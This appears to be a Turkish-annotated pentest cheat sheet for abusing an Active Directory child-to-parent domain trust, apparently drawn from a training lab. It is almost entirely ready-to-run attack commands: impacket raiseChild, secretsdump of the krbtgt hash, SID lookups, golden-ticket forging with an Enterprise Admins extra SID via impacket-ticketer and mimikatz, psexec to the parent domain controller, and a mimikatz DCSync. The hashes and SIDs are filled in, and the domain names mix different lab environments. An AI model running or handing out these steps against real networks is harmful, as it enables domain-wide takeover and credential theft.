Domain Trust
Child -> Parent Trust
# Otomatik
impacket-raiseChild -target-exec 172.16.5.5 CHILD.COMP.LOCAL/administrator
# Burdan gerekli bilgileri alıyoruz
impacket-secretsdump child.comp.local/administrator@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
impacket-lookupsid child.comp.local/administrator@172.16.5.240 | grep "Domain SID"
impacket-lookupsid child.comp.local/administrator@172.16.5.240 | grep -B12 "Enterprise Admins"
# Child KRBTGT Hash
# Child Domain SID
# Enterprise Admin SID + 519
# Random Username
impacket-ticketer -nthash 9d765b482771505cbe97411065964d5f -domain CHILD.COMP.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
export KRB5CCNAME=hacker.ccache
impacket-psexec CHILD.COMP.LOCAL/hacker@dc01.comp.local -k -no-pass -target-ip 172.16.5.5
Import-Module .\PowerView.ps1
Get-DomainSID
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
./mimikatz.exe "kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt" exit
klist
./mimikatz.exe "lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL" exit
Last updated
Was this helpful?